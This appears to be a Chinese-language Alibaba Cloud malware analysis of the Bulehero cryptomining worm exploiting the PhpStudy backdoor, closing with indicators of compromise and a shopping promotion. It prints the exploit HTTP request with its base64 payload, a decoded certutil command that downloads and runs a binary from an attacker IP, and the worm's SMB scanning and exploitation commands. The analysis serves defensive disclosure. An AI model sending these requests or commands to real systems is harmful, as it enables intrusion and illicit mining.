近日,阿里雲安全團隊監控到Bulehero挖礦蠕蟲進行了版本升級,蠕蟲升級後開始利用最新出現的PHPStudy後門漏洞做爲新的攻擊方式對Windows主機進行攻擊,攻擊成功後會下載門羅幣挖礦程序進行牟利。該挖礦程序會大肆搶佔服務器CPU資源進行門羅幣的挖掘,形成服務器卡頓,嚴重影響正常業務運行,甚至形成業務終端。關於該蠕蟲最先曝光於2018年7月,蠕蟲自出現後頻繁更新,陸續加入多達數十種的的攻擊方式,能夠預計該黑客團伙將會不斷的尋找新的攻擊方式來植入其惡意程序。建議用戶及時排查自身主機是否存在安全漏洞,並關注阿里雲安全團隊的相關文章。php
Bulehero挖礦蠕蟲最先出現於2018年初,初次曝光於2018年8月,因最先使用bulehero.in域名被命名爲Bulehero。該蠕蟲專一於攻擊Windows服務器,經過植入惡意挖礦軟件進行牟利。它使用多種複雜的攻擊方式進行傳播,自出現後更新頻繁,不斷的將新的攻擊方式加入本身的武器庫。shell
PhpStudy是國內的一款免費的PHP調試環境的程序集成包,在國內有着近百萬的PHP語言學習者和開發者用戶。在2019年9月20日,網上爆出PhpStudy存在「後門」:黑客早在2016年就編寫了「後門」文件,並不是法侵入了PhpStudy的官網,篡改了軟件安裝包植入「後門」。該「後門」具備遠程控制計算機的功能,能夠遠程控制下載運行腳本實現用戶我的信息收集。據報道黑客利用該漏洞共非法控制計算機67萬餘臺,非法獲取大量帳號密碼類、聊天數據類、設備碼類等數據10萬餘組。該「後門」除了會形成挖礦和信息泄露,還有可能被勒索病毒利用,服務器關鍵數據被勒索病毒加密後將沒法找回,給被害者形成大量的數據、經濟損失。windows
攻擊者會向被攻擊的服務器發送一個利用漏洞的HTTP GET請求,惡意代碼存在於請求頭的Accept-Charset字段,字段內容通過base64編碼。解碼後能夠發現這是一段windows命令:利用certutil.exe工具下載download.exesass
GET /index.php HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7 Accept-Encoding: gzip,deflate Accept-Language: zh-cn Referer: http://xxx:80/index.php User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: xxx
解碼後內容:安全
system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');
如上圖是惡意文件在主機中的行爲流程圖,download.exe是Bulehero的下載器,會下載名爲ScarupnpLogon.exe
的文件。該文件會釋放多個打包的惡意文件,這些惡意文件可分爲三個模塊:挖礦模塊、掃描模塊、攻擊模塊。服務器
C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445
C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
咱們對比Bulehero升級前的樣本行爲,發現它在主機中的行爲並未有較大改變,依然是經過download.exe下載器下載文件包,並釋放三個功能模塊。可是它爲了隱藏自身改變了惡意文件命名方式,升級前經過混淆的系統文件名進行假裝,升級後所有爲隨機的文件路徑和文件名。雖然隨機文件名相對於混淆系統文件名更容易暴露本身,但這種策略的好處是能夠避免被其餘挖礦病毒經過進程指紋清除,在資源競爭中佔據優點。工具
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP netsh ipsec static add filteraction name=BastardsList action=block
修改主機host防止其餘競爭者劫持域名。學習
cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
咱們根據Bulehero的惡意文件編譯時間和文件上傳時間,能夠肯定Bulehero的升級時間是在10月6號的23點,距離PhpStudy後門漏洞利用方式曝光只有2周。若是企業存在漏洞,去除中間的國慶長假,真正留給企業的修復之間只有幾天。從惡意文件下載次數來看,截止到發稿前已經有1萬5千次的下載,可見該蠕蟲傳播速度極快,形成的破壞性很大。網站
除了這次更新增長的PhpStudy後門漏洞,Bulehero還使用多種攻擊方式,以下是其餘已知的攻擊方式。阿里雲
60[.]164[.]250[.]170
185[.]147[.]34[.]136
fky[.]dfg45dfg45[.]best
uu[.]dfg45dfg45[.]best
uu1[.]dfg45dfg45[.]best
ox[.]mygoodluck[.]best
oo[.]mygoodluck[.]best
雙11福利來了!先來康康#怎麼買雲服務器最便宜# [並不簡單]參團購買指定配置雲服務器僅86元/年,開團拉新享三重禮:1111紅包+瓜分百萬現金+31%返現,爆款必買清單,還有iPhone 11 Pro、衛衣、T恤等你來抽,立刻來試試手氣!https://www.aliyun.com/1111/2019/home?utm_content=g_1000083110
本文做者:桑鐸
本文爲雲棲社區原創內容,未經容許不得轉載。